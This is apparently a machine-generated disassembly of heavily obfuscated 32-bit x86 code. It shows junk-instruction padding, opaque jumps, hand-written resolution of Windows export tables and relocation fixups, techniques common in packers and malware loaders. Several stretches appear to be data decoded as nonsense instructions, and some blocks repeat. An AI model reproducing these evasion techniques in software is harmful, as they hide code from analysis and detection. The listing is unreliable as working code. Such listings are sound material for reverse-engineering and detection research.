jmp rwxdata
lea esp [ esp + 0x40 ]
je rwxdata
shld bx cx cl
shrd di bx cl
add [ ebp - 0x4 ] ecx
shr bl cl
bswap edi
sub ecx 0x8
lea edi [ eax - 0x320015bf ]
lea edi [ 0x39649162 ]
shr di 0x7
shr ecx 0x1
dec edi
not bx
mov edi [ esi ]
ror bl cl
btr bx ax
dec bh
add edi [ ebp + 0x10 ]
pushfd
xor bh dh
add esi 0x8
sub esp 0xfffffffc
mov bl 0xaf
sub bh 0xc8
mov bx [ esi ]
pushfd
shr ebx 0xc
call j_sub_10065401
sub_100646b7
lea esp [ esp + 0x2c ]
call sub_100419c9
push 0x24188168
pushfd
lea esp [ esp + 0x8 ]
jae rwxdata
push ecx
push 0x34a20b5a
pushad
lodsb [ esi ]
cmc
cmc
stc
clc
xor al 0xb3
clc
sub al 0xdd
stc
jmp rwxdata
xchg al bl
jmp rwxdata
jmp rwxdata
inc al
mov bl 0x2
dec al
pushad
call sub_10064e08
pushfd
ror al 0x3
call sub_100664d2
test edx 0x663057a6
movzx ecx [ edi + ecx * 2 ]
sbb di 0xaa3e
movsx di cl
btr edi 0x1b
sub edi 0xea7ba9b2
mov edi [ edx + 0x1c ]
mov [ esp + 0x4 ] eax
add edi eax
jmp rwxdata
clc
clc
push 0xcc0586a1
mov edi [ edi + ecx * 4 ]
pushfd
test edi edi
pushfd
lea esp [ esp + 0x34 ]
je rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
bt dx sp
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
pushfd
add eax edi
pushad
call sub_100676c1
sub_100648b2
pushfd
ror dl 0x3
test ah 0xb9
sub dl 0x61
pushfd
push [ esp + 0x12 ]
popf
mov [ esp + 0x10 ] cl
pushad
inc esi
mov [ esp + 0x8 ] 0xd1
pushfd
call sub_1006903a
sub_100648d5
lea esp [ esp + 0x10 ]
jae rwxdata
pushad
jmp rwxdata
clc
rcl di cl
cmc
mov ebx eax
sbb ch 0x2e
mov edi eax
cmp dh dh
btr cx 0x5
inc cl
mov ecx 0x104
stc
cmc
stc
stc
xor al al
pushfd
[ edi ]
pushad
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
call sub_1003f238
sub_100649ed
lea esp [ esp + 0x2c ]
je rwxdata
bsf bx si
dec bh
bswap bx
shl bh cl
mov bx [ esi ]
stc
call sub_1006a09f
push 0xe611edfa
lea esp [ esp + 0x4 ]
jpe rwxdata
call sub_1004366f
cmp ebx 0x2
call sub_10064493
sub_10064ad0
adc al al
pushfd
pushfd
pushfd
lea esp [ esp + 0x38 ]
jae rwxdata
call j_sub_1005d07a
push 0xed2c51ff
mov [ esp ] ah
jmp rwxdata
mov [ esp ] 0xb1
lea esp [ esp + 0x4 ]
jne rwxdata
cmp bl 0xf0
push esi
sub si 0x7e6d
not esi
movzx si bl
lea esi [ esp - 0x1a9f955 ]
mov esi edi
clc
jmp sub_1005ce4d
push edx
call sub_10063472
sub_10064bc3
ror al 0x2
pushfd
inc al
mov [ esp + 0x4 ] 0xaeaec6ca
clc
xor al 0xce
pushad
push [ esp ]
jmp rwxdata
ror al 0x6
pushfd
clc
cmp al [ edi ]
not al
lea edi [ edi + 0x1 ]
mov ax [ esp + 0x4 ]
mov eax [ esp + 0x30 ]
jmp rwxdata
lea esp [ esp + 0x34 ]
ja rwxdata
jmp rwxdata
pushfd
pushfd
lea esp [ esp + 0x8 ]
jb rwxdata
cmc
cmp bp 0xb418
cmp ecx [ ebp - 0x4 ]
pushad
jmp rwxdata
pushfd
pushfd
pushad
push 0x189935b5
lea esp [ esp + 0x2c ]
jb rwxdata
jb rwxdata
lea esp [ esp + 0x20 ]
jae rwxdata
test di bp
cmp ecx [ ebp - 0x8 ]
push ecx
lea esp [ esp + 0x4 ]
jbe rwxdata
stc
bt dx 0x6
cmp [ edi - 0x1 ] 0x0
pushad
call sub_1005d577
jno rwxdata
or dh al
sub eax eax
pushfd
cmp ebx 0xe40da8a5
add ecx 0x1
pushfd
pushad
pushfd
pushfd
mov [ ebp - 0x8 ] ecx
pushfd
lea esp [ esp + 0x34 ]
jmp rwxdata
clc
sub ecx 0x1
shld esi edi cl
neg si
bswap di
dec esi
mov [ ebp - 0x4 ] ecx
pushfd
cmp [ edi - 0x1 ] 0x0
pushfd
mov [ esp + 0x4 ] sp
lea esp [ esp + 0x8 ]
jne rwxdata
cmc
pushfd
cmp [ edi - 0x1 ] 0x0
pushad
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
call sub_10060da9
call sub_10041d30
sbb edi 0x2add862d
mov edi [ edx + 0x24 ]
bt ax bp
cmc
call sub_1005cc5e
jmp rwxdata
lea esp [ esp + 0x24 ]
jne rwxdata
bt bp sp
mov edi [ edx + 0x24 ]
push ebx
bt ax 0x6
add edi eax
push esp
bt si 0x6
cmc
bt si 0xe
movzx ecx [ edi + ecx * 2 ]
add esp 0x8
sub edi 0x2087d37
mov edi [ edx + 0x1c ]
pushfd
add edi eax
bt esp ebx
push [ esp ]
sub esp 0xfffffff8
jl rwxdata
cmc
mov edi [ edi + ecx * 4 ]
clc
test edi edi
push 0x325475bd
lea esp [ esp + 0x4 ]
je rwxdata
mov edi [ edi + ecx * 4 ]
push 0xdb8b4f51
cmp al 0xe2
clc
clc
test edi edi
push [ esp ]
pushfd
lea esp [ esp + 0xc ]
je rwxdata
stc
call sub_1005d937
pushfd
pushfd
add eax edi
mov [ esp + 0x4 ] cl
stc
cmp eax edx
pushad
pushfd
pushfd
lea esp [ esp + 0x30 ]
jb rwxdata
pushad
jmp rwxdata
push 0xb399fcc3
cmp eax [ ebp - 0x10 ]
pushfd
call j_sub_1005ce9a
sub_10064bf6
cmp [ edi ] 0x23
pushfd
lea esp [ esp + 0xc ]
jne rwxdata
cmc
btr cx 0x8
clc
mov ecx edi
push 0x6c2d4cd6
jmp rwxdata
aas
shl ah 0x1
sar ax 0x1
bts ax bx
sub edx edx
push 0xf86d6839
das
adc ax 0x1dc8
lahf
mov eax edx
shl al cl
add edi 0x1
mov [ esp ] 0x19
clc
mov al [ edi ]
cmp bl 0x89
test al al
pushad
lea esp [ esp + 0x24 ]
je rwxdata
mov al [ ecx ]
call sub_10077273
movsx di al
movzx cx cl
pushad
mov edi edx
lea esp [ esp + 0x20 ]
bt edx 0x1c
call sub_10043e6d
sub_10064e08
dec al
inc ecx
pushad
pushfd
mov al 0x10
lea esp [ esp + 0x48 ]
jno rwxdata
jmp sub_10064665
push esi
mov [ esp ] dx
mov [ esp ] dl
lea esp [ esp + 0x4 ]
call sub_100419c9
push 0x8ab44565
push 0xee09e138
pushfd
adc al al
call sub_100412ce
sub_10064e3c
push 0x90545c7d
pushad
mov [ esp ] dh
inc ecx
lea esp [ esp + 0x24 ]
push 0x83336343
pushad
push 0x269c29e1
mov [ esp + 0x4 ] 0x82
lea esp [ esp + 0x28 ]
call sub_100419c9
pushad
mov [ esp ] 0x6
mov [ esp + 0x4 ] 0x9e
adc ecx ecx
pushad
call sub_10065ce2
sub_10064e75
pushad
lea esp [ esp + 0x24 ]
jb rwxdata
test di bp
cmp ecx [ ebp - 0x8 ]
push ecx
lea esp [ esp + 0x4 ]
jbe rwxdata
stc
cmp [ edi - 0x1 ] 0x0
pushfd
push 0x1b41d0e8
lea esp [ esp + 0x8 ]
jne rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
clc
sub ecx 0x1
shld esi edi cl
neg si
bswap di
dec esi
mov [ ebp - 0x4 ] ecx
call sub_10060da9
call sub_10041d30
bsf di si
cmc
mov edi [ edx + 0x24 ]
test si cx
add edi eax
cmp al 0xa7
stc
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
movzx ecx [ edi + ecx * 2 ]
neg di
rcr di cl
mov edi [ edx + 0x1c ]
cmc
jmp rwxdata
pushad
add edi eax
push [ esp ]
call sub_1006aded
sub_100652ea
mov [ esp ] 0x73
pushfd
pushad
lea esp [ esp + 0x28 ]
jne rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
pushfd
pushfd
call sub_10064473
or dh al
sub eax eax
pushad
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_100658d8
sub al al
bt si 0x8
bt cx sp
pushad
[ edi ]
jmp rwxdata
lea esp [ esp + 0x24 ]
jne rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
shl si 0x1
xor ch 0xd9
mov ecx edi
neg esi
neg si
sub ecx ebx
shl si 0x5
not si
mov esi esp
cmp dh bl
bt bp 0x9
clc
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub edi 0x4
clc
clc
push [ edi ]
clc
clc
bt bp cx
pushad
cmp edi ebx
pushfd
mov [ esp + 0x4 ] 0xdf
pushfd
lea esp [ esp + 0x28 ]
ja rwxdata
cmp dh 0xbb
cmp si 0xd6b3
sub edi 0x4
pushad
pushad
call sub_10065a55
pushfd
sub ebx edi
bsr di si
neg di
bsf di dx
rol di cl
lea esp [ esp + 0x4 ]
add ebx esp
bswap di
jae rwxdata
bts di di
neg al
mov edi ebx
clc
mov al 0x2e
clc
test edx esi
clc
[ edi ]
call sub_100652ea
mov al 0xed
shr di 0x7
mov edi ebx
clc
mov al 0x2e
stc
clc
clc
stc
[ edi ]
pushfd
push esi
mov [ esp ] al
push 0x8d371cfa
lea esp [ esp + 0xc ]
jne rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
pushad
pushfd
push [ esp + 0x4 ]
mov [ edi - 0x1 ] 0x0
push 0x2b8b04d5
pushfd
push eax
lea esp [ esp + 0x34 ]
jmp rwxdata
lahf
lea eax [ eax + 0x1deff11f ]
call sub_100634a4
sub_10065ce2
lea esp [ esp + 0x44 ]
jne rwxdata
pushfd
jmp rwxdata
call sub_100419c9
jmp rwxdata
pushfd
lea esp [ esp + 0x8 ]
call sub_100419c9
call sub_10064642
aam 0x41
out dx al
outsb
jmp rwxdata
jb rwxdata
push 0x83336343
pushad
push 0x269c29e1
mov [ esp + 0x4 ] 0x82
lea esp [ esp + 0x28 ]
call sub_100419c9
pushad
mov [ esp ] 0x6
mov [ esp + 0x4 ] 0x9e
adc ecx ecx
pushad
call sub_10065ce2
pushad
pushad
push esi
pushfd
push [ esp + 0x48 ]
retn 0x4c
sub_10065fd6
lea esp [ esp + 0x8 ]
jbe rwxdata
stc
bt sp si
sub ecx [ edx + 0x10 ]
push edx
pushad
cmp ecx [ edx + 0x14 ]
push [ esp ]
jmp rwxdata
rcl di cl
mov edi [ edx + 0x24 ]
btr ebx 0xf
sar bx 0x9
cmc
add edi eax
clc
pushad
pushad
adc cx di
mov ebx [ edx + 0x20 ]
xor cx 0x1507
rol cl 0x4
sar ch cl
jmp sub_10069fda
lea esp [ esp + 0x28 ]
jae rwxdata
or dh al
sub eax eax
push ebx
push 0x8080526c
mov [ esp + 0x4 ] al
pushfd
lea esp [ esp + 0xc ]
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub edi 0x2087d37
mov edi [ edx + 0x1c ]
pushfd
add edi eax
bt esp ebx
push [ esp ]
sub esp 0xfffffff8
jl rwxdata
cmc
mov edi [ edi + ecx * 4 ]
clc
test edi edi
push 0x325475bd
lea esp [ esp + 0x4 ]
je rwxdata
mov edi [ edi + ecx * 4 ]
push 0xdb8b4f51
cmp al 0xe2
clc
clc
test edi edi
push [ esp ]
pushfd
lea esp [ esp + 0xc ]
je rwxdata
stc
call sub_1005d937
pushfd
pushfd
add eax edi
mov [ esp + 0x4 ] cl
stc
cmp eax edx
pushad
pushfd
pushfd
lea esp [ esp + 0x30 ]
jb rwxdata
pushad
jmp rwxdata
push 0xb399fcc3
cmp eax [ ebp - 0x10 ]
pushfd
call j_sub_1005ce9a
sub_100660a3
jne rwxdata
pushad
jmp rwxdata
push esp
mov dl 0xcd
pushf
pop [ esp + 0x2 ]
sar dl cl
mov dl [ esi ]
clc
cmp bl 0x3c
cmp bx si
cmc
xor dl 0xb3
cmc
jmp rwxdata
push ebp
jmp rwxdata
sub dl 0xdd
pushfd
call sub_100648b2
lea esp [ esp + 0x24 ]
retn
sub_100660c8
push [ esp + 0x4 ]
lea esp [ esp + 0x3c ]
je rwxdata
or dh al
sub eax eax
stc
add eax edi
test ax sp
cmp dl bl
stc
cmp eax edx
pushad
lea esp [ esp + 0x20 ]
jpo rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
jmp rwxdata
jb rwxdata
pushad
push [ esp + 0x8 ]
push 0xef1757d6
lea esp [ esp + 0x28 ]
jb rwxdata
pushad
jmp rwxdata
pushfd
cmp eax [ ebp - 0x10 ]
pushad
call sub_100673e0
test al 0x7
pushfd
call sub_1003f522
sub_100661db
lea esp [ esp + 0x30 ]
je rwxdata
jmp rwxdata
jmp rwxdata
pop ebx
jb rwxdata
jmp rwxdata
pushfd
mov bp 0x256a
call sub_1005db40
add [ eax ] al
dec esp
outsd
arpl [ ecx + 0x6c ] sp
inc esi
jb rwxdata
push eax
bswap bp
mov edi [ esp + 0x4 ]
not bp
not esi
push 0xb63a025
pop ebp
mov esi [ esp + 0x8 ]
bswap bp
pushad
movzx bp cl
movsx bp dl
mov ebp [ esp + 0x2c ]
pushfd
pushfd
pushfd
push [ esp + 0x3c ]
retn 0x48
pushad
push 0x4eeca407
adc ecx ecx
push [ esp ]
mov [ esp ] dh
mov [ esp ] 0x6f
pushfd
lea esp [ esp + 0x2c ]
jmp rwxdata
push ss
xchg ecx eax
xor ebx edi
nop
fstpnce st2
or ebx 0x44
and [ ecx - 0x53cb0261 ] 0x28
xchg edi eax
xchg ah bh
jpo rwxdata
add [ gs : esi ] al
add [ ecx + 0x52422b53 ] cl
or al 0x67
mov bh 0xf7
[ edi - 0x75 ]
dec bl
call sub_100631f7
nop
mov edi [ ebx + ecx * 8 - 0x1933f8e3 ]
cmp al 0x19
stosb [ edi ]
jno rwxdata
movsb [ edi ] [ esi ]
push 0x3b
mov ch 0x9
hlt
adc [ ebp + 0x4f ] ch
dec esi
in ax 0x1c
jpo rwxdata
push cs
pop ss
inc [ cs : eax + 0x202cdbeb ]
mov gs [ ebx + 0x5fb64324 ]
and [ eax - 0x63 ] ebp
inc esp
inc esp
jo rwxdata
popfd
jle rwxdata
out 0x8c eax
outsb
out 0x61 al
push 0xbeea1196
hlt
push ebx
sub [ edi - 0x9 ] 0x13
lodsd [ esi ]
pop esi
inc esp
pop eax
xchg esi eax
sub [ esi - 0x79b739a8 ] 0x6c
cli
xor dh dl
scasb [ edi ]
sub eax 0x8df10dc0
mov ebp 0x77d7177c
scasd [ edi ]
stc
adc ebx [ 0x10880cfb ]
insd
dec edi
push esi
and esi esp
pop es
mov eax [ 0xffffffffac34fd9f ]
sub [ edi + 0x337bfc86 ] dl
xor al 0x42
push edx
mov edi 0x96e618f6
0x8353
out 0x58 eax
pop esp
mov ebx 0x70d000c1
pop esi
mov al 0x2c
mov [ edi - 0x19 ] ebx
xor [ esi ] edx
in eax 0x37
ror [ eax - 0x5 ] cl
jb rwxdata
stosb [ edi ]
jne rwxdata
dec ebp
popfd
xchg ecx eax
cli
out 0xdd al
clc
ficom [ edi - 0x1e ]
js rwxdata
out 0x7 al
dec ebp
push ds
add [ edx ] ebp
inc ecx
int 0x7e
cmp dh [ edx ]
sti
add [ eax - 0x515a48e ] bl
popad
popfd
mov gs dx
dec eax
salc
int3
sub_100664d2
bt cx 0xb
cmp bh 0xb1
sub al 0x61
sub esp 0xffffffd0
je rwxdata
bt bx dx
jmp rwxdata
stc
pushfd
cmp bh 0xc9
shr eax 0x1
pushad
pushfd
call sub_1006956e
shr eax 0x1
push 0x2b5ddc4a
pushfd
lea esp [ esp + 0x8 ]
je rwxdata
jmp rwxdata
pushad
adc ecx ecx
pushfd
lea esp [ esp + 0x24 ]
jmp rwxdata
pop ebx
jb rwxdata
dec bl
call sub_100631f7
pushfd
mov bp 0x256a
call sub_1005db40
add [ eax ] al
dec esp
outsd
arpl [ ecx + 0x6c ] sp
inc esi
jb rwxdata
push eax
bswap bp
mov edi [ esp + 0x4 ]
not bp
not esi
push 0xb63a025
pop ebp
mov esi [ esp + 0x8 ]
bswap bp
pushad
movzx bp cl
movsx bp dl
mov ebp [ esp + 0x2c ]
pushfd
pushfd
pushfd
push [ esp + 0x3c ]
retn 0x48
push ss
xchg ecx eax
xor ebx edi
nop
fstpnce st2
or ebx 0x44
and [ ecx - 0x53cb0261 ] 0x28
xchg edi eax
xchg ah bh
jpo rwxdata
add [ gs : esi ] al
add [ ecx + 0x52422b53 ] cl
or al 0x67
mov bh 0xf7
[ edi - 0x75 ]
nop
mov edi [ ebx + ecx * 8 - 0x1933f8e3 ]
cmp al 0x19
stosb [ edi ]
jno rwxdata
movsb [ edi ] [ esi ]
push 0x3b
mov ch 0x9
hlt
adc [ ebp + 0x4f ] ch
dec esi
in ax 0x1c
jpo rwxdata
push cs
pop ss
inc [ cs : eax + 0x202cdbeb ]
mov gs [ ebx + 0x5fb64324 ]
and [ eax - 0x63 ] ebp
inc esp
inc esp
jo rwxdata
popfd
jle rwxdata
out 0x8c eax
outsb
out 0x61 al
push 0xbeea1196
hlt
push ebx
sub [ edi - 0x9 ] 0x13
lodsd [ esi ]
pop esi
inc esp
pop eax
xchg esi eax
sub [ esi - 0x79b739a8 ] 0x6c
cli
xor dh dl
scasb [ edi ]
sub eax 0x8df10dc0
mov ebp 0x77d7177c
scasd [ edi ]
stc
adc ebx [ 0x10880cfb ]
insd
dec edi
push esi
and esi esp
pop es
mov eax [ 0xffffffffac34fd9f ]
sub [ edi + 0x337bfc86 ] dl
xor al 0x42
push edx
mov edi 0x96e618f6
0x8353
out 0x58 eax
pop esp
mov ebx 0x70d000c1
pop esi
mov al 0x2c
mov [ edi - 0x19 ] ebx
xor [ esi ] edx
in eax 0x37
ror [ eax - 0x5 ] cl
jb rwxdata
stosb [ edi ]
jne rwxdata
dec ebp
popfd
xchg ecx eax
cli
out 0xdd al
clc
ficom [ edi - 0x1e ]
js rwxdata
out 0x7 al
dec ebp
push ds
add [ edx ] ebp
inc ecx
int 0x7e
cmp dh [ edx ]
sti
add [ eax - 0x515a48e ] bl
popad
popfd
mov gs dx
dec eax
salc
int3
sub_100665b5
push 0xfd57b0ca
lea esp [ esp + 0x8 ]
jae rwxdata
push ecx
push 0x34a20b5a
pushad
lodsb [ esi ]
cmc
cmc
stc
clc
xor al 0xb3
clc
sub al 0xdd
stc
jmp rwxdata
inc bl
pushfd
mov bl 0x2
push 0xa4feafad
push [ esp ]
not al
call sub_10063110
jmp rwxdata
pushfd
ror al 0x3
call sub_100664d2
test edx 0x663057a6
movzx ecx [ edi + ecx * 2 ]
sbb di 0xaa3e
movsx di cl
btr edi 0x1b
sub edi 0xea7ba9b2
mov edi [ edx + 0x1c ]
mov [ esp + 0x4 ] eax
add edi eax
jmp rwxdata
clc
clc
push 0xcc0586a1
mov edi [ edi + ecx * 4 ]
pushfd
test edi edi
pushfd
lea esp [ esp + 0x34 ]
je rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
bt dx sp
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
pushfd
add eax edi
pushad
call sub_100676c1
sub_1006708a
dec ecx
pushad
push [ esp ]
jmp rwxdata
jmp rwxdata
lea esp [ esp + 0x48 ]
jne rwxdata
mov bl 0xaf
sub bh 0xc8
mov bx [ esi ]
pushfd
shr ebx 0xc
call j_sub_10065401
neg ch
push esp
inc cl
sar ecx 0x10
mov ecx [ ebp - 0x4 ]
call sub_1004113f
sub_10067094
inc al
pushfd
jmp rwxdata
clc
bt bx 0x7
xor al 0xce
clc
push 0x8f8b8cc4
pushfd
ror al 0x6
stc
cmp al bl
cmp al [ edi ]
bswap ax
cwde
bswap ax
lea edi [ edi + 0x1 ]
lea eax [ esi - 0x2ee82493 ]
movsx ax dl
call sub_10044599
sub_100673e0
lea esp [ esp + 0x28 ]
jae rwxdata
pushad
jmp rwxdata
cmc
mov ebx eax
movzx cx al
shrd cx bx 0xf
ror di cl
pushad
mov edi eax
bsf ecx edi
rol cl cl
mov ecx 0x104
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
test si 0x218
push ebx
xor al al
mov [ esp ] 0x19
call sub_10068898
sub_100676c1
cmp eax edx
pushfd
lea esp [ esp + 0x2c ]
jb rwxdata
pushad
jmp rwxdata
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
cmc
pushad
clc
cmp eax [ ebp - 0x10 ]
pushad
call sub_1003f132
sub_10067724
cmp cl ch
pushfd
sub ecx ebx
mov [ esp + 0x4 ] 0x82
mov [ esp + 0xc ] cx
push [ esp + 0x8 ]
jmp rwxdata
lea esp [ esp + 0x2c ]
jne rwxdata
jmp rwxdata
push 0x492e89e2
pushfd
lea esp [ esp + 0x8 ]
call j_sub_10041c02
xchg ecx eax
push 0x46d966fe
dec eax
mov [ esp ] 0xf3
jmp rwxdata
pushfd
shl eax 0x8
call sub_100411f9
sub_1006773c
mov [ esp ] edx
pushfd
lea esp [ esp + 0x28 ]
jae rwxdata
pushad
jmp rwxdata
neg cl
lea ecx [ esp + 0x4b025990 ]
mov ebx eax
xadd di cx
mov edi eax
sar ecx cl
mov ecx 0x104
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
stc
xor al al
stc
jmp rwxdata
cmc
[ edi ]
pushfd
push 0x33760800
mov [ esp + 0x4 ] 0x1cbd
lea esp [ esp + 0x8 ]
jne rwxdata
or dh al
sub eax eax
xor si 0x5bbc
ror ecx cl
neg esi
cmc
mov ecx edi
bts si 0x1
rcr si cl
sub ecx ebx
and si dx
not si
mov esi esp
cmp al 0xa4
bt si 0x1
jmp rwxdata
sub edi 0x4
pushfd
push [ esp ]
stc
push [ edi ]
pop [ esp + 0x4 ]
bt dx 0xc
pushfd
push [ esp ]
cmp edi ebx
pushfd
jmp rwxdata
lea esp [ esp + 0x10 ]
ja rwxdata
cmp dh 0xbb
cmp si 0xd6b3
sub edi 0x4
pushad
pushad
call sub_10065a55
shr al 0x2
sar al cl
sar al 0x7
sub ebx edi
not al
adc al ch
add ebx esp
mov al ch
mov edi ebx
neg al
rol al 0x1
jmp rwxdata
sar al 0x3
mov al 0x2e
test cl 0x86
[ edi ]
pushfd
lea esp [ esp + 0x4 ]
jne rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
pushfd
movsx ax dl
call sub_10044cea
sub_100678ff
lea esp [ esp + 0x28 ]
jne rwxdata
call sub_10041d30
lea edi [ eax - 0x1a64130c ]
shl di cl
mov edi [ edx + 0x24 ]
push 0x67ef4253
jmp rwxdata
add edi eax
bt si di
test bl 0x2b
movzx ecx [ edi + ecx * 2 ]
lea edi [ edx * 8 + 0x5e27289 ]
bsr di sp
mov edi [ edx + 0x1c ]
bt dx cx
mov [ esp ] dh
add edi eax
clc
mov edi [ edi + ecx * 4 ]
pushad
test edi edi
pushad
call sub_10064110
sub_100686e0
mov [ esp + 0x8 ] 0x8a33341b
pushfd
lea esp [ esp + 0x10 ]
je rwxdata
bt ebp ecx
mov bx [ esi ]
pushad
clc
stc
and ebx 0xfff
stc
jmp rwxdata
push ebp
lea esp [ esp + 0x4 ]
jmp rwxdata
jmp rwxdata
cmp al 0xd2
pushad
clc
add esi 0x2
jmp rwxdata
cmp dh 0xcb
add [ ebx + edi ] edx
lea esp [ esp + 0x20 ]
call sub_1006708a
sub_10068c7d
mov [ esp + 0x8 ] 0x60fb0e6a
pushad
lea esp [ esp + 0x28 ]
jmp rwxdata
jmp rwxdata
pushfd
pushad
mov [ esp ] 0x62e7
mov [ esp + 0x20 ] eax
push 0x494ef5fb
mov [ esp + 0x20 ] ebx
jmp rwxdata
push ebp
mov [ esp + 0x20 ] esi
pushfd
push [ esp ]
mov [ esp ] bh
mov [ esp + 0x24 ] ebp
pushad
pushfd
mov [ esp ] ch
mov [ esp + 0x44 ] edx
push 0x64406dd
jmp rwxdata
push [ esp ]
pushfd
mov [ esp + 0x4c ] esi
pushfd
mov [ esp ] 0x77
mov [ esp + 0x4c ] edi
pushfd
mov [ esp ] ecx
mov [ esp + 0x14 ] 0xf09d
lea esp [ esp + 0x50 ]
jmp rwxdata
lea edi [ ebp + 0x63f42afc ]
push ecx
push edx
pushfd
pop [ esp ]
xchg bp si
push [ rwxdata ]
mov si bp
bswap si
xchg bp si
push 0x0
mov si 0x7e1e
movsx edi cl
mov esi [ esp + 0x30 ]
push ecx
inc esi
rcl bp cl
rol esi 0xe
movsx bx al
push esp
call sub_1007982d
sub_10069284
lea esp [ esp + 0x58 ]
ja rwxdata
jmp rwxdata
jmp rwxdata
cmc
cmp bp 0xb418
cmp ecx [ ebp - 0x4 ]
pushad
jmp rwxdata
jb rwxdata
lea esp [ esp + 0x20 ]
jae rwxdata
test di bp
cmp ecx [ ebp - 0x8 ]
push ecx
lea esp [ esp + 0x4 ]
jbe rwxdata
jmp rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
pushfd
cmp ebx 0xe40da8a5
add ecx 0x1
pushfd
pushad
pushfd
pushfd
mov [ ebp - 0x8 ] ecx
pushfd
lea esp [ esp + 0x34 ]
jmp rwxdata
clc
sub ecx 0x1
shld esi edi cl
neg si
bswap di
dec esi
mov [ ebp - 0x4 ] ecx
call sub_10066009
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
call sub_10060da9
sub_10069a74
lea esp [ esp + 0x2c ]
jne rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
xadd esi ecx
mov ecx edi
movsx si cl
sub ecx ebx
bts si 0x3
add si 0x68e0
btr si sp
mov esi esp
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
jmp rwxdata
sub edi 0x4
cmc
jmp rwxdata
clc
push [ edi ]
pushad
stc
stc
cmp edi ebx
pushad
jmp rwxdata
pushfd
jmp rwxdata
lea esp [ esp + 0x44 ]
ja rwxdata
cmp dh 0xbb
cmp si 0xd6b3
sub edi 0x4
pushad
pushad
call sub_10065a55
shl al cl
cmp sp ax
cmc
cmc
sub ebx edi
inc al
and al bl
add ebx esp
test ch 0x57
and di ax
cmp dl 0xda
mov edi ebx
push 0xe21763f4
mov al 0x2e
cmp dh 0x53
stc
[ edi ]
mov [ esp ] ebp
call sub_10064e03
sub_10069ab5
rcr ecx cl
mov ecx [ edx + 0x18 ]
lea esp [ esp + 0x44 ]
test di bp
cmp ecx [ ebp - 0x8 ]
push ecx
lea esp [ esp + 0x4 ]
jbe rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
clc
sub ecx 0x1
shld esi edi cl
neg si
bswap di
dec esi
mov [ ebp - 0x4 ] ecx
call sub_10060da9
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
sub_1006a09f
pushfd
bt si dx
and ebx 0xfff
test ah dh
pushfd
bt esp ebx
push [ esp ]
add [ ebx + edi ] ax
push esp
mov [ esp + 0x8 ] esp
lea esp [ esp + 0x14 ]
jmp rwxdata
cmp al 0xd2
pushad
clc
add esi 0x2
jmp rwxdata
call sub_1006708a
sub_1006a74d
pushad
jmp rwxdata
test edx 0x663057a6
movzx ecx [ edi + ecx * 2 ]
sbb di 0xaa3e
movsx di cl
btr edi 0x1b
sub edi 0xea7ba9b2
mov edi [ edx + 0x1c ]
mov [ esp + 0x4 ] eax
add edi eax
jmp rwxdata
clc
clc
push 0xcc0586a1
mov edi [ edi + ecx * 4 ]
pushfd
test edi edi
pushfd
lea esp [ esp + 0x34 ]
je rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
bt dx sp
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
pushfd
add eax edi
pushad
call sub_100676c1
sub_1006ab1b
stc
mov [ esp + 0xc ] 0xe71e
stc
ror al 0x2
mov [ esp + 0x4 ] bh
mov [ esp ] bp
mov [ esp + 0x4 ] esp
mov [ esp + 0x4 ] cl
inc al
cmc
stc
xor al 0xce
lea esp [ esp + 0x50 ]
jl rwxdata
jmp rwxdata
ror al 0x6
test bl ah
test cl ah
cmp al [ edi ]
setle ah
movzx eax bl
lea edi [ edi + 0x1 ]
cwde
cwde
movzx ax dl
mov al ah
pop eax
push eax
jmp rwxdata
clc
ror al 0x6
cmp bl ah
stc
cmp cl 0xca
cmc
cmp al [ edi ]
setl al
lea eax [ eax - 0x2a34fd97 ]
lea edi [ edi + 0x1 ]
bswap ax
pop eax
push ecx
pushfd
lea esp [ esp + 0x8 ]
ja rwxdata
pushad
lea esp [ esp + 0x24 ]
ja rwxdata
jmp rwxdata
call sub_1006083b
call sub_10064e75
cmc
cmp bp 0xb418
cmp ecx [ ebp - 0x4 ]
pushad
jmp rwxdata
lea esp [ esp + 0x20 ]
jae rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
pushfd
cmp ebx 0xe40da8a5
add ecx 0x1
pushfd
pushad
pushfd
pushfd
mov [ ebp - 0x8 ] ecx
pushfd
lea esp [ esp + 0x34 ]
jmp rwxdata
mov edx [ esp + 0x20 ]
pushfd
call sub_100418dd
call sub_10060da9
sub_1006ab68
push [ esp ]
lea esp [ esp + 0x14 ]
ja rwxdata
push 0xfc5e96f0
mov esp esi
pushfd
mov [ esp ] ch
pushad
pushad
lea esp [ esp + 0x44 ]
jmp rwxdata
clc
jmp rwxdata
or dh al
sub eax eax
pushad
jmp rwxdata
